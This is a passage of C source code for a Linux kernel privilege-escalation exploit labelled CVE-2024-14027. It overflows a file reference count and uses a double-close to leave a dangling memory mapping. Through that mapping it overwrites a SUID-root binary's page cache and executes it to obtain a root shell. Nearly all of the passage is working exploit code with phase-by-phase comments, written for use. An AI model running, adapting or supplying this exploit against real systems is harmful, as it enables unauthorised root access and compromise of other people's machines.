        *(volatile char *)(addr + i);

    close(fd);
    return addr;
}

/* ------------------------------------------------------------------ */
/* Main                                                                */
/* ------------------------------------------------------------------ */
int main(int argc, char **argv)
{
    pid_t worker_pids[NUM_WORKERS];

    /* ---- Stage 0: If we ARE the overwritten SUID binary, get root ---- */
    if (!geteuid()) {
        setuid(0);
        setgid(0);
        execve("/bin/sh", (char *const []){"/bin/sh", NULL}, NULL);
        _exit(1);
    }

    if (!getuid()) {
        fprintf(stderr, "[!] Don't run as root — run as unprivileged user\n");
        return 1;
    }

    setbuf(stdout, NULL);

    char *suid_path = argc > 1 ? argv[1] : SUID_TARGET;

    printf("[*] CVE-2024-14027 → root shell (double-close technique)\n");
    printf("[*] Target SUID binary: %s\n\n", suid_path);

    /* ---- Verify SUID target ---- */
    struct stat suid_st;
    if (stat(suid_path, &suid_st) != 0) {
        printf("[!] %s not found\n", suid_path);
        return 1;
    }
    if (suid_st.st_uid != 0 || !(suid_st.st_mode & S_ISUID)) {
        printf("[!] %s is not SUID root\n", suid_path);
        return 1;
    }

    /* ---- Map exploit binary and SUID target ---- */
    size_t prog_size, suid_size;
    const void *prog_addr = map_file("/proc/self/exe", &prog_size);
    const void *suid_addr = map_file(suid_path, &suid_size);

    if (suid_size < prog_size) {
        printf("[!] %s (%zu bytes) too small for exploit (%zu bytes)\n",
               suid_path, suid_size, prog_size);
        printf("[!] Compile without -static or choose a larger target\n");
        return 1;
    }
    printf("[+] Exploit: %zu bytes, %s: %zu bytes — OK\n",
           prog_size, suid_path, suid_size);

    /* ---- Pin to CPU 0 ---- */
    cpu_set_t cpu0;
    CPU_ZERO(&cpu0);
    CPU_SET(0, &cpu0);
    sched_setaffinity(0, sizeof(cpu0), &cpu0);

    /* ---- Create pipes FIRST (SLUB isolation) ---- */
    int pipes[4][2];
    for (int i = 0; i < 4; i++) {
        if (pipe(pipes[i]) < 0) { perror("[!] pipe"); return 1; }
    }
    printf("[+] Pipes created (8 struct files on cpu_slab)\n");

    /* ---- Open target, dup → f_count = 2 ---- */
    target_fd = open("/tmp/exploit_target", O_RDWR | O_CREAT | O_TRUNC, 0666);
    if (target_fd < 0) { perror("[!] open target"); return 1; }
    dangling_fd = dup(target_fd);
    if (dangling_fd < 0) { perror("[!] dup"); return 1; }
    printf("[+] target_fd=%d  dangling_fd=%d  (f_count=2)\n",
           target_fd, dangling_fd);

    /* ---- Clone idle child (slow-path fdget during overflow) ---- */
    pid_t idle_child;
    {
        void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (stack == MAP_FAILED) { perror("[!] mmap stack"); return 1; }
        idle_child = clone(idle_fn, (char *)stack + STACK_SIZE,
                           CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
        if (idle_child < 0) { perror("[!] clone idle"); return 1; }
    }

    /* ---- Overflow f_count ---- */
    int fast_mode = (access("/tmp/fast_mode", F_OK) == 0);

    if (fast_mode) {
        printf("[*] FAST MODE: 100 leaks + sync() for GDB\n");
        for (int i = 0; i < 100; i++)
            fast_fremovexattr(target_fd, (const void *)0x1UL);
        printf("[*] f_count = 102. Calling sync() — attach GDB now\n");
        fflush(NULL);
        sync();
        printf("[*] Continuing after GDB...\n");
    } else {
        printf("[*] Spawning %d leak workers...\n", NUM_WORKERS);
        for (int i = 0; i < NUM_WORKERS; i++) {
            void *stack = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (stack == MAP_FAILED) { perror("[!] mmap"); return 1; }
            worker_pids[i] = clone(leak_worker, (char *)stack + STACK_SIZE,
                                   CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
            if (worker_pids[i] < 0) { perror("[!] clone worker"); return 1; }
        }

        unsigned long target_bulk = TARGET_LEAKS - SLACK;
        printf("[*] Need %lu leaks (%.2fG)\n", TARGET_LEAKS, TARGET_LEAKS / 1e9);

        go = 1;
        __sync_synchronize();

        unsigned long last = 0;
        while (leak_count < target_bulk) {
            sleep(2);  /* usleep() with an argument >= 1s is unspecified by POSIX */
            unsigned long cur = leak_count;
            double pct = 100.0 * cur / TARGET_LEAKS;
            double rate = (cur - last) / 2.0 / 1e6;
            unsigned long remaining = TARGET_LEAKS - cur;
            double eta = (rate > 0) ? remaining / (rate * 1e6) : 9999;
            printf("\r[*] %luM / 4294M (%.1f%%)  %.1fM/s  ETA %.0fs   ",
                   cur / 1000000, pct, rate, eta);
            last = cur;
        }

        stop_workers = 1;
        __sync_synchronize();
        for (int i = 0; i < NUM_WORKERS; i++)
            waitpid(worker_pids[i], NULL, 0);

        unsigned long done = leak_count;
        printf("\n[*] Workers done: %lu leaks\n", done);

        if (done < TARGET_LEAKS) {
            unsigned long remain = TARGET_LEAKS - done;
            printf("[*] Finishing %lu precisely...\n", remain);
            for (unsigned long i = 0; i < remain; i++) {
                fast_fremovexattr(target_fd, (const void *)0x1UL);
                if ((i & 0xFFFFF) == 0 && i > 0)
                    printf("\r[*] precise: %luM / %luM   ",
                           i / 1000000, remain / 1000000);
            }
            printf("\n");
        } else {
            unsigned long extra = done - TARGET_LEAKS;
            /* (0 - extra) mod 2^32 — 0x100000000 would not fit in a 32-bit long */
            unsigned long fixup = (0UL - extra) & 0xFFFFFFFFUL;
            printf("[*] Overshot by %lu, fixup %lu leaks...\n", extra, fixup);
            for (unsigned long i = 0; i < fixup; i++)
                fast_fremovexattr(target_fd, (const void *)0x1UL);
        }
    }

    /* ---- Kill idle child → fast-path fdget ---- */
    kill(idle_child, SIGKILL);
    waitpid(idle_child, NULL, 0);
    printf("[+] Overflow done, fast-path fdget enabled\n\n");

    /* ================================================================
     * DOUBLE-CLOSE TECHNIQUE
     * ================================================================ */

    /* Phase 1: Free the struct file via fork helper.
     *
     * After overflow, f_count=0 (wrapped). close() alone does
     * dec_and_test(0→0xFFFFFFFF) which is NOT zero → no __fput.
     *
     * Fix: fork() calls get_file() with unconditional atomic_long_inc
     * on every fd → bumps f_count from 0 to 2 (target_fd + dangling_fd).
     * Child closes both → dec_and_test brings 2→1→0 → __fput → freed.
     * (Same mechanism exploit.c uses implicitly via spawner/closer forks.)
     */
    printf("[*] Phase 1: fork helper to free struct file\n");
    {
        pid_t free_pid = fork();
        if (free_pid == 0) {
            close(target_fd);
            close(dangling_fd);
            _exit(0);
        }
        if (free_pid < 0) { perror("[!] fork"); return 1; }
        waitpid(free_pid, NULL, 0);
    }
    /* Clean up parent's target_fd (fput on freed memory — harmless
     * since slot is not yet reused; dec_and_test(0→-1) ≠ 0). */
    close(target_fd);

    /* Phase 2+3: Spray temp files and probe stale fd, with retry loop.
     * After 22 min of overflow, the cpu_slab may have changed; the freed
     * object might land on a partial page.  We spray, check, and if a
     * kernel-internal file grabbed the slot, close everything, wait for
     * that file to be freed, and try again.
     */
    int temp_fds[NUM_SPRAY];
    int match_fd = -1;
    int match_idx = -1;
    char stale_fd_path[64];
    snprintf(stale_fd_path, sizeof(stale_fd_path),
             "/proc/self/fd/%d", dangling_fd);

    for (int attempt = 0; attempt < MAX_DC_RETRIES; attempt++) {
        if (attempt == 0) {
            /* First attempt: short RCU grace period */
            printf("[*] Waiting for RCU grace period...\n");
            usleep(200000);
        } else {
            printf("[*] Retry %d/%d: re-spraying after 200ms...\n",
                   attempt, MAX_DC_RETRIES);
            usleep(200000);
        }

        printf("[*] Phase 2: Opening %d temp files O_RDWR\n", NUM_SPRAY);
        for (int i = 0; i < NUM_SPRAY; i++) {
            char path[64];
            snprintf(path, sizeof(path), TEMP_PREFIX "_%d", i);
            temp_fds[i] = open(path, O_RDWR | O_CREAT | O_TRUNC, 0600);
            if (temp_fds[i] < 0) { perror("[!] open temp"); return 1; }
            unlink(path);
            if (ftruncate(temp_fds[i], prog_size) < 0) {
                perror("[!] ftruncate");
                return 1;
            }
        }

        printf("[*] Phase 3: Probing stale fd %d\n", dangling_fd);

        /* readlink for diagnostics */
        char link_buf[256];
        ssize_t link_len = readlink(stale_fd_path, link_buf,
                                    sizeof(link_buf) - 1);
        if (link_len > 0) {
            link_buf[link_len] = '\0';
            printf("[*]   readlink → %s\n", link_buf);
        }

        int flags = fcntl(dangling_fd, F_GETFL);
        if (flags < 0) {
            printf("[-] fcntl failed (errno=%d)\n", errno);
            for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
            continue;
        }

        struct stat stale_sb;
        if (fstat(dangling_fd, &stale_sb) != 0) {
            printf("[-] fstat failed\n");
            for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
            continue;
        }
        printf("[*]   ino=%lu dev=(%d,%d) flags=0x%x\n",
               (unsigned long)stale_sb.st_ino,
               major(stale_sb.st_dev), minor(stale_sb.st_dev), flags);

        if ((flags & O_ACCMODE) != O_RDWR) {
            printf("[-] Not O_RDWR, retrying...\n");
            for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
            continue;
        }

        match_fd = -1;
        match_idx = -1;
        for (int i = 0; i < NUM_SPRAY; i++) {
            struct stat sb;
            if (fstat(temp_fds[i], &sb) == 0 &&
                sb.st_ino == stale_sb.st_ino &&
                sb.st_dev == stale_sb.st_dev) {
                match_fd = temp_fds[i];
                match_idx = i;
                break;
            }
        }

        if (match_fd >= 0) {
            printf("[+] Match: temp_fds[%d] (fd %d)\n", match_idx, match_fd);
            break;
        }

        printf("[-] No match (slot taken by ino=%lu dev=(%d,%d)), retrying...\n",
               (unsigned long)stale_sb.st_ino,
               major(stale_sb.st_dev), minor(stale_sb.st_dev));
        for (int i = 0; i < NUM_SPRAY; i++)
            close(temp_fds[i]);
    }

    if (match_fd < 0) {
        printf("[!] Failed after %d retries — SLUB reuse failed\n",
               MAX_DC_RETRIES);
        return 1;
    }

    /* Phase 4: mmap the matched temp file.
     * MAP_SHARED + PROT_WRITE — but DON'T touch the mapping yet.
     * Pages are faulted lazily; we want them to resolve after the swap.
     */
    printf("[*] Phase 4: Creating writable mmap (%zu bytes)\n", prog_size);
    void *mmap_addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE,
                           MAP_SHARED, match_fd, 0);
    if (mmap_addr == MAP_FAILED) { perror("[!] mmap"); return 1; }
    printf("[+] Mapped at %p\n", mmap_addr);

    /* Close ALL temp fds — mmap holds the last f_count reference */
    for (int i = 0; i < NUM_SPRAY; i++)
        close(temp_fds[i]);

    /* Phase 5: Double-free.
     * close(dangling_fd) calls filp_close → fput on the temp file's struct file.
     * f_count was 1 (only mmap) → now 0 → __fput → struct file freed via RCU.
     * The mmap's VMA now has a DANGLING vm_file pointer.
     */
    printf("[*] Phase 5: close(dangling_fd) → double free\n");
    close(dangling_fd);
    printf("[*] Waiting for RCU grace period...\n");
    usleep(200000);

    /* Phase 6: Reallocate with SUID target O_RDONLY.
     * One of these open() calls grabs the freed slab slot.
     * The mmap's vm_file now points to the SUID binary's struct file.
     * f_mapping → SUID inode's address_space.
     */
    printf("[*] Phase 6: Opening %s O_RDONLY x%d\n", suid_path, NUM_SPRAY);
    int suid_fds[NUM_SPRAY];
    for (int i = 0; i < NUM_SPRAY; i++) {
        suid_fds[i] = open(suid_path, O_RDONLY);
        if (suid_fds[i] < 0) { perror("[!] open suid"); return 1; }
    }

    /* Phase 7: Overwrite via mmap.
     * memcpy triggers page faults → resolved via vm_file->f_mapping
     * → SUID binary's page cache → writes land in the SUID binary.
     * The mmap was created with PROT_WRITE (checked at mmap time against
     * the temp file). The kernel doesn't re-verify after the struct file swap.
     */
    printf("[*] Phase 7: Overwriting %s via mmap (%zu bytes)...\n",
           suid_path, prog_size);
    memcpy(mmap_addr, prog_addr, prog_size);

    /* Close SUID fds */
    for (int i = 0; i < NUM_SPRAY; i++)
        close(suid_fds[i]);

    /* Phase 8: Verify and exec.
     * Re-read the SUID binary to check if overwrite succeeded.
     */
    size_t verify_size;
    const void *verify_addr = map_file(suid_path, &verify_size);
    if (memcmp(verify_addr, prog_addr, prog_size) == 0) {
        printf("\n[+] *** %s successfully overwritten! ***\n", suid_path);
        printf("[*] Spawning root shell...\n\n");
        execve(suid_path, (char *const []){suid_path, NULL}, NULL);
        perror("[!] execve");
    } else {
        printf("[-] Overwrite verification failed — SUID binary unchanged\n");
        printf("[-] Page cache may not have been swapped correctly\n");
    }

    /* Become a ghost to avoid VFS refcount warning on exit
     * (dangling mmap holds a freed struct file reference) */
    setsid();
    close(0); close(1); close(2);
    sigset_t set;
    sigfillset(&set);
    sigprocmask(SIG_BLOCK, &set, NULL);
    for (;;) pause();

    return 1;
}